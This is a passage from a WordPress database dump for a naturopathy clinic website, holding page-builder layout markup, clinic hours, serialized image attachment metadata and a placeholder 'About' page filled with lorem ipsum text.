et_pb_text_4 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n </div> <!-- .et_pb_text --><div class=\"et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_center et_pb_module \">\n <a class=\"et_pb_button et_pb_button_0 et_pb_bg_layout_dark\" href=\"https://verdenaturopathy.com.au/bookings\">Make a booking</a>\n </div>\n </div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_5 et_pb_css_mix_blend_mode_passthrough et-last-child\">\n \n \n <div class=\"et_pb_module et_pb_text et_pb_text_5 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n <div class=\"et_pb_text_inner\">Clinic Hours<br />\nTues/Wed: 9am-4pmThurs: 11am-7pmSaturday: 9:30am-1pm</div>\n </div> <!-- .et_pb_text -->\n </div> <!-- .et_pb_column -->\n \n \n </div> <!-- .et_pb_row -->\n \n \n </div> <!-- .et_pb_section --></p>\n'),(732,500,'footnotes',''),(745,509,'footnotes',''),(733,502,'_wp_attached_file','2025/10/VerdeNaturopathy-PrimaryLogo-Moss.png'),(734,502,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2084;s:6:\"height\";i:895;s:4:\"file\";s:45:\"2025/10/VerdeNaturopathy-PrimaryLogo-Moss.png\";s:8:\"filesize\";i:52070;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"VerdeNaturopathy-PrimaryLogo-Moss-300x129.png\";s:5:\"width\";i:300;s:6:\"height\";i:129;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4605;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"VerdeNaturopathy-PrimaryLogo-Moss-1024x440.png\";s:5:\"width\";i:1024;s:6:\"height\";i:440;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17675;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"VerdeNaturopathy-PrimaryLogo-Moss-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2819;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"VerdeNaturopathy-PrimaryLogo-Moss-768x330.png\";s:5:\"width\";i:768;s:6:\"height\";i:330;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13986;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:46:\"VerdeNaturopathy-PrimaryLogo-Moss-1536x660.png\";s:5:\"width\";i:1536;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29941;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:46:\"VerdeNaturopathy-PrimaryLogo-Moss-2048x880.png\";s:5:\"width\";i:2048;s:6:\"height\";i:880;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42651;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:45:\"VerdeNaturopathy-PrimaryLogo-Moss-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7249;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:46:\"VerdeNaturopathy-PrimaryLogo-Moss-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25296;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:45:\"VerdeNaturopathy-PrimaryLogo-Moss-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7382;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:45:\"VerdeNaturopathy-PrimaryLogo-Moss-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9859;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:46:\"VerdeNaturopathy-PrimaryLogo-Moss-1080x464.png\";s:5:\"width\";i:1080;s:6:\"height\";i:464;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19060;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:45:\"VerdeNaturopathy-PrimaryLogo-Moss-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8447;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:46:\"VerdeNaturopathy-PrimaryLogo-Moss-1280x550.png\";s:5:\"width\";i:1280;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25430;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:45:\"VerdeNaturopathy-PrimaryLogo-Moss-980x421.png\";s:5:\"width\";i:980;s:6:\"height\";i:421;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16574;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:45:\"VerdeNaturopathy-PrimaryLogo-Moss-480x206.png\";s:5:\"width\";i:480;s:6:\"height\";i:206;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8049;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(275,28,'_et_pb_truncate_post_date','2025-10-21 14:08:48'),(276,28,'_et_builder_version','VB|Divi|4.9.4'),(696,424,'_et_pb_use_builder','on'),(697,424,'_et_pb_show_page_creation','off'),(728,476,'footnotes',''),(730,488,'footnotes',''),(310,28,'_edit_lock','1743508459:1'),(300,88,'_wp_attached_file','2021/05/height-cropped.jpg'),(301,88,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:450;s:6:\"height\";i:250;s:4:\"file\";s:26:\"2021/05/height-cropped.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"height-cropped-300x167.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"height-cropped-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:26:\"height-cropped-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:27:\"height-cropped-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:26:\"height-cropped-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:26:\"height-cropped-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:26:\"height-cropped-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:28:\"height-cropped-2880x1800.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(305,29,'_wp_old_date','2021-04-30'),(306,30,'_wp_old_date','2021-04-30'),(314,101,'_wp_attached_file','2021/05/3-01.jpg'),(315,102,'_wp_attached_file','2021/05/4-01.jpg'),(316,102,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:1280;s:4:\"file\";s:16:\"2021/05/4-01.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"4-01-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"4-01-576x1024.jpg\";s:5:\"width\";i:576;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"4-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:16:\"4-01-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:16:\"4-01-720x675.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:16:\"4-01-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:16:\"4-01-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:16:\"4-01-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:16:\"4-01-480x853.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:853;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1620473194\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:4:\"Icon\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(335,126,'_wp_attached_file','2021/05/4-01.png'),(336,126,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:81;s:6:\"height\";i:140;s:4:\"file\";s:16:\"2021/05/4-01.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(337,127,'_wp_attached_file','2021/05/5-01.png'),(338,127,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:70;s:6:\"height\";i:140;s:4:\"file\";s:16:\"2021/05/5-01.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(341,145,'_wp_attached_file','2021/05/2-01-large.png'),(342,145,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:683;s:4:\"file\";s:22:\"2021/05/2-01-large.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"2-01-large-88x300.png\";s:5:\"width\";i:88;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"2-01-large-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:22:\"2-01-large-200x250.png\";s:5:\"width\";i:200;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:22:\"2-01-large-200x675.png\";s:5:\"width\";i:200;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:22:\"2-01-large-200x284.png\";s:5:\"width\";i:200;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:22:\"2-01-large-200x382.png\";s:5:\"width\";i:200;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:22:\"2-01-large-200x516.png\";s:5:\"width\";i:200;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(329,118,'_wp_attached_file','2021/05/1-01.png'),(330,118,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:80;s:6:\"height\";i:140;s:4:\"file\";s:16:\"2021/05/1-01.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(331,119,'_wp_attached_file','2021/05/2-01.png'),(332,119,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:68;s:6:\"height\";i:140;s:4:\"file\";s:16:\"2021/05/2-01.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(339,144,'_wp_attached_file','2021/05/1-01-large.png'),(340,144,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:409;s:4:\"file\";s:22:\"2021/05/1-01-large.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"1-01-large-147x300.png\";s:5:\"width\";i:147;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"1-01-large-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:22:\"1-01-large-200x250.png\";s:5:\"width\";i:200;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:22:\"1-01-large-200x284.png\";s:5:\"width\";i:200;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:22:\"1-01-large-200x382.png\";s:5:\"width\";i:200;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(333,122,'_wp_attached_file','2021/05/3-01.png'),(334,122,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:89;s:6:\"height\";i:140;s:4:\"file\";s:16:\"2021/05/3-01.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(344,27,'_et_pb_use_builder','on'),(345,27,'_et_pb_show_page_creation','off'),(346,27,'_et_pb_old_content','<!-- wp:pagelayer/pl_post_props {\"post_title\":\"About Us\",\"post_name\":\"about\",\"post_status\":\"publish\",\"featured_image\":\"\",\"ele_bg_hover_delay\":\"400\",\"post_excerpt\":\"\",\"pagelayer-id\":\"mb61598\"} /-->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"custom\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_type\":\"image\",\"ele_bg_img\":\"12\",\"ele_bg_attachment\":\"scroll\",\"ele_bg_posx\":\"center\",\"ele_bg_posy\":\"center\",\"ele_bg_repeat\":\"no-repeat\",\"ele_bg_size\":\"cover\",\"min_height\":\"350px\",\"ele_margin\":\"-96px,0px,0px,0px\",\"ele_margin_tablet\":\"-125px,0px,0px,0px\",\"ele_margin_mobile\":\"-158px,0px,0px,0px\",\"min_height_mobile\":\"255px\",\"pagelayer-id\":\"msd3635\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"pagelayer-id\":\"e6s2964\"} -->\n<!-- wp:pagelayer/pl_post_title {\"title_color\":\"#fafafaff\",\"typo\":\",35,,700,,,Solid,,Uppercase,,\",\"align\":\"left\",\"ele_margin\":\"11em,0em,0em,0em\",\"ele_margin_mobile\":\"10em,0em,0em,0em\",\"typo_mobile\":\",25,,,,,Solid,,,,\",\"pagelayer-id\":\"qvn9489\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"ngm8752\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"ff83615\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003ch6u003eAboutu003c/h6u003e\",\"pagelayer-id\":\"d8n7169\"} --><h6>About</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"u003ch5u003eAboutu003c/h5u003e\",\"pagelayer-id\":\"9ml5869\"} --><h5>About</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"text\":\"u003ch2u003eAboutu003c/h2u003e\",\"pagelayer-id\":\"f4d7469\"} --><h2>About</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"u003cp style=u0022text-align: centeru0022u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. u003cbr /u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.u003cbr /u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.u003c/pu003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"fvd5890\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"lkd8577\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"6\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"0px,10px,0px,10px\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"pagelayer-id\":\"o2c2573\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"u003ch5u003ePaul Volkmeru003c/h5u003e\",\"pagelayer-id\":\"gsu3042\"} --><h5>Paul Volkmer</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-44px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"u003ch3u003eOwneru003c/h3u003e\",\"pagelayer-id\":\"q4i9931\"} --><h3>Owner</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003cpu003eDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"p7d8782\"} --><p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"v1r1036\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003eLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. u003c/pu003e\",\"pagelayer-id\":\"d9t765\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"u003cpu003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.u003c/pu003e\",\"pagelayer-id\":\"bou1254\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"u003cpu003e Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.u003c/pu003e\",\"pagelayer-id\":\"9wj610\"} --><p> Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text 